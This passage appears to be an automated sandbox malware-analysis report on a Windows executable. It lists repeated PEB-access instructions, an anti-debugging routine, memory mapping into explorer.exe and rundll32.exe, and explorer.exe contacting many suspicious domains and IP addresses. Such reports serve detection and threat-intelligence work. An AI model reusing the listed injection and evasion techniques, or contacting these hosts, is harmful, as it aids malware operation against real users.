          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04638E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04648EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04618794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04620050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04687016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04683884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04624120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0462C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0463A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04632990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04609240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04694257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04618A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04605210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0460AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.borderlesstrade.info
          Source: C:\Windows\explorer.exeDomain query: www.swashbug.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.253.212.22 80
          Source: C:\Windows\explorer.exeDomain query: www.hispekdiamond.com
          Source: C:\Windows\explorer.exeDomain query: www.bl927.com
          Source: C:\Windows\explorer.exeDomain query: www.7chd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80
          Source: C:\Windows\explorer.exeDomain query: www.zagorafinancial.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.142.156.44 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.114.201 80
          Source: C:\Windows\explorer.exeDomain query: www.montcoimmigrationlawyer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exeDomain query: www.mojilifenoosa.com
          Source: C:\Windows\explorer.exeDomain query: www.3992199.com
          Source: C:\Windows\explorer.exeDomain query: www.fibermover.com
          Source: C:\Windows\explorer.exeDomain query: www.funnyfootballmugs.com
          Source: C:\Windows\explorer.exeDomain query: www.przyczepy.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 169.1.24.244 80
          Source: C:\Windows\explorer.exeDomain query: www.cdefenders.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
